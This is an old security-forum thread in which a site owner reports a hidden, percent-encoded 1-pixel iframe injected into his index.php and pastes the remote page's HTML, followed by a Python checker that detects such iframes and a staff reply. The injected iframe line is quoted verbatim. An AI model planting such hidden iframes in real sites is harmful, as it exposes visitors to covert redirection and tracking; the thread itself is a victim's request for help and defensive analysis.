Site Hack....But Why?

Discussion in 'Security and Privacy' started by elton, 2005/12/20.

  1. 2005/12/20
    elton (Inactive, Thread Starter) | Joined: 2005/12/20 | Messages: 1 | Likes Received: 0

    Hi,

    A friend of mine, and a moderator on a couple of your other forums (Newt), suggested I post this here.

    I recently noticed something odd with a site that I own, although I'll be honest and say that it's one I don't have to do much with. It's hosted with ipowerweb in the USA.

    So, I downloaded the index.php page and found out that the following code had been inserted:

    Code:
    <iframe src= http://%77%77%77%2E%74%72%75%73%74%34%66%72%65%65%2E%77%73?id=index12 frameborder= "0" width= "1" height= "1" scrolling= "no" name=counter></iframe>
    The site address translates as a page on trust4free.ws

    Does anyone know what that page might do? Or can anyone shed any further light on what might have happened?

    The source code of that page, to save you viewing it, is:

    Code:
    <HTML>
    
    <HEAD>
    
      <TITLE>
       the YASUDA's web page
      </TITLE>
    
    English page is <A HREF =  "# "> here </A> 
    
    
    
                <!-- ZoneLabs Privacy Insertion -->
                <script language='javascript' src='http://127.0.0.1:2633/js.cgi?pcaw&r=3093'></script>
    
    <BODY BGCOLOR=99CCFF>
    
    <script language=JavaScript>
    setInterval( "window.status=blockedReferrer   ",1);
    </SCRIPT>
    
    <CENTER><BR>
      <FONT SIZE=6 COLOR=3366FF><B>
    
    _¡ "y'%ˆ_w_’'…'ÿ'©
    
      </B></FONT></CENTER><BR>
    <P>
    '¦'ý'+'>! _ "'_A_A_____J'Å’Cold Spring Harbor_ý<Ã…___iCSHL)'‰'ÿ'©Karel
    Svoboda_ý<Å_ó'…"]___o%ˆ_w'à_ý<Å'ç'„'÷'„'÷'œ'ú_B<L%ô'Œò_q___J_j_Y__'ˆ
    '‡'à'_'—'„'÷'Å“'ú_B2005 "N'Å’7__'c'§_A<A HREF= "http://neuro.duke.edu ">
    Duke'¥_w'Å’___o_ð_w%ˆ</A>'…_%_{'à_n'Ÿ'Å“'ú_B
    </P>
    <p>
    
    Accesses since 7/30/2004
    
    
    <table border=0 cellpadding=8 cellspacing=5 width=95%>
    
    <tr><td align=left bgcolor=FFFFCC width=60%> <CENTER><A
    HREF= "# "> <B>_A_____J'…_%_{'à' 'õ'_'÷ </B> <BR> <small> 
    _e_j_:_A_g_%_b_N'–'Œ "ü </small></A>
    </CENTER>
    </td><td bgcolor=white width=40%><small>
    _A_____J'…'¢''„'©'¥_w<__Ã¥'Å’_E'T'ç'Å’_o%Ÿ'à'Å“'†'Ÿ'_' 'Å’'…'ú_B
    </small></td></tr>
    
    <tr><td align=left bgcolor=FFFFCC width=60%>
    <CENTER><A HREF= "# ">
    <B>%p_ª_ë "ò "-\'õ''•'ú</B></A>
    </CENTER>
    </td><td bgcolor=white width=40%><small>
    %p_ª'ò%ó_¨'ˆ_ "'ò_A_ë "ò "-\'Å’'_'÷'‰'__“'ç'„'©'+'†_B
    </small></td></tr>
    
    <tr><td align=left bgcolor=FFFFCC width=60%>
    <CENTER><A HREF= "# ">
    <B>_\_t_g_E_F_A</B></A>
    </CENTER>
    </td><td bgcolor=white width=40%><small>
    Mac_–_W'Å’_c_¬_\_t_g_E_F_A'ˆ'‡'…'ú_B
    </small></td></tr>
    
    <!--------------------->
    
    <tr><td align=left bgcolor=FFFFCC width=60%>
    <CENTER><A HREF= "http://d.hatena.ne.jp/ryasuda/ ">
    <B>''„'ˆ "ê<L</B></A>
    </CENTER>
    </td><td bgcolor=white width=40%><small>
    Ryohei's Neuroscience Notes
    </small></td></tr>
    
    <!--------------------->
    
    <tr><td align=left bgcolor=FFFFCC width=60%>
    <CENTER><A HREF= "http://d.hatena.ne.jp/ryasuda/ ">
    <B>''„'ˆ_A_ "_e_i</B></A>
    </CENTER>
    </td><td bgcolor=white width=40%><small>
    Ryohei'ò''„'÷'©_y_[_W'…'ú_B
    </small></td></tr>
    
    <!--------------------->
    
    <tr><td align=left bgcolor=FFFFCC width=60%>
    <CENTER><A HREF= "# ">
    <B>__-š_^</B></A>
    </CENTER>
    </td><td bgcolor=white width=40%><small>
    __'___'ð'¦'‘'>'Å’'_'Å’___£ "-\'ˆ'‡_B
    </small></td></tr>
    
    <!--------------------->
    
    <tr><td align=left bgcolor=FFFFCC width=60%>
    <CENTER><A HREF= "# ">
    <B>-ò-à</B></A>
    </CENTER>
    </td><td bgcolor=white width=40%><small>
    'â„¢'á'Å’_c_ˆ_%®'Å“'…_B
    </small></td></tr>
    </TABLE>
    </P>
    
    <P>
    <A HREF= "# ">
    _õ "… _ý<Ã…_e_[_}_F "<L%ô'Å’ò_q___J_j_Y__'à'T'© "</A> _''<'c'ô_B-__n'Å’_l_ì'<
    </P>
    
    
    <BR>
    <HR>
    <CENTER>
    
     "-_T_C_g'–'Å’___ "_N'_c-R'‰'ç'„'-'_'_'÷_B_A-_'K-v'ÿ'¨'Å“'ü'á_B<BR>
    
    <A HREF= "# "> back to homepage (Japanese) </A></B><BR>
    <A HREF= "# "> back to homepage (Englih) </A></B><BR>
    
    <A HREF= "mailto:yasuda@cshlshiomi7.org ">
    E-mail : yasuda@cshlshiomi7.org</A> <BR>
    
    <A HREF= "http://d.hatena.ne.jp/ryasuda/19000101/ "> "ê-{_ª'Å’___[_<''+'õ
    '§'à_Q_†'ç'„'-'_'_'÷</A>
    <BR>
    
    <HR>
    <center>
    <P>
    <A HREF= "/ ">home</A></P>
    </CENTER> 
    
    <!--STATS4ALL_COUNTER_CODE_START-->
    <script language= "javascript "><!--
    sver = 10;screensize=" ";colors=" ";navlan=" ";plug=" ";
    mainref = " ";
    ref = escape(blockedReferrer  )+" ";
    sUrl = escape(document.URL)+" ";
    if((ref==" ") || (ref== "undefined ")){ref= "bookmark ";};
    nav=navigator.appName;zi= "cn ";img =  "mg ";
    if(nav.substring(0,9)== "Microsoft "){nav= "MSIE ";};
    version=Math.round(parseFloat(navigator.appVersion)*100);
    if((nav== "MSIE ") && (parseInt(version)==2)){version=301;};java=" ";
    if(navigator.appName== "Netscape "){ if(version>400) navlan=navigator.language;
    if(version>300)for(var i=0;i<navigator.plugins.length;i++)plug +=navigator.plugins[i].name+ ": "};
    //--></script>
    <script language= "javascript1.1 "><!--
    sver=11;java=(navigator.javaEnabled()==true)? "y ": "n ";
    //--></script>
    <script language= "javascript1.2 "><!--
    sver=12;screensize=screen.width+ "* "+screen.height;
    colors=(nav== "MSIE ")?screen.colorDepth:screen.pixelDepth;
    if(colors== "undefined "){colors=" ";};
    //--></script>
    <script language= "javascript1.3 "><!--
    sver=13;
    //--></script>
    <script language= "javascript1.4 "><!--
    sver=14;
    //--></script>
    <script language= "javascript "><!--
    arguments= "&nav= "+nav+ "&version= "+version+ "&screensize= "+screensize+ "&colors= "+colors+ "&sver= "+sver;
    arguments+= "&java= "+java+ "&ref= "+ref+ "&mainref= "+mainref+ "&navlan= "+navlan+ "&plug= "+escape(plug)+ "&sUrl= "+sUrl;
    document.write ( "<A HREF='http://www.stats4all.cc/?login=login' target=_blank><i "+img+" width=1 height=1 BORDER=0 SRC='http://stats4all.cc/ "+zi+ "/?wmid=login" + arguments +  "&sExtra=None'></i "+img+ "></A> ")
    //--></script>
    <script language= "javascript1.2 "><!--
    document.write( "< ");document.write( "!-- ");
    //--></script>
    <noscript>
    <a href='http://stats4all.cc/?login=login' target=_blank>
    <img src='http://127.0.0.1:2633/bug.cgi'>                                                                          </a>
    </noscript>
    <script language= "javascript1.2 "><!--
    document.write( "-- ");document.write( "> ");
    //--></script>
    <!--STATS4ALL_COUNTER_CODE_END-->
    
    </BODY>
    
    </HTML>
    
    <!-- ZoneLabs Popup Blocking Insertion -->
    <script language='javascript'>postamble();</script>
    The ZoneLabs stuff will have been inserted by my copy of ZoneAlarm.

    Thanks in advance for any help.

    Elton
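
A defender-side check for the pattern described in the post above, as an added example that is not part of the original thread: it parses a page, flags iframes whose host is percent-encoded or whose size makes them invisible, and reports the decoded address. The names `audit` and `IframeAudit`, the 2-pixel threshold and the surrounding sample markup are assumptions; only the injected tag is taken from the post.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Constructed sample: the injected tag quoted in the post, placed in made-up
# markup next to a benign iframe for contrast.
SAMPLE = '''<html><body>
<iframe src="https://example.com/map" width="600" height="400"></iframe>
<iframe src= http://%77%77%77%2E%74%72%75%73%74%34%66%72%65%65%2E%77%73?id=index12 frameborder= "0" width= "1" height= "1" scrolling= "no" name=counter></iframe>
</body></html>
'''
MAX_HIDDEN_PX = 2  # assumption: anything this small is not meant to be seen

def _pixels(value):
    """Return an int for values like "1" or "1px"; None for "100%", missing, etc."""
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value or "", re.I)
    return int(m.group(1)) if m else None

def _host(url):
    try:
        return urlsplit(url).netloc
    except ValueError:  # malformed URL; treat as having no host
        return ""

class IframeAudit(HTMLParser):
    """Collects iframes that hide their destination or their presence."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        src = a.get("src") or ""
        decoded = unquote(src)  # undo %77-style escapes so the host is readable
        reasons = []
        if "%" in _host(src):  # legitimate links do not escape plain letters
            reasons.append("percent-encoded host")
        w, h = _pixels(a.get("width")), _pixels(a.get("height"))
        if w is not None and h is not None and max(w, h) <= MAX_HIDDEN_PX:
            reasons.append("invisible size")
        if reasons:
            self.findings.append({"line": self.getpos()[0], "src": decoded,
                                  "host": _host(decoded), "reasons": reasons})

def audit(html_text):
    parser = IframeAudit()
    parser.feed(html_text)
    parser.close()
    return parser.findings
```

Run over a downloaded copy of each page, `audit(open(path, encoding="utf-8", errors="replace").read())` returns one entry per suspicious iframe, with the line number to inspect in the file.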
     
  2. 2005/12/22
    TonyT (SuperGeek, Staff) | Joined: 2002/01/18 | Messages: 9,072 | Likes Received: 400

    Let's see the actual source code, the code of the php file, not just the html that's embedded in the php file, but all of it.
     
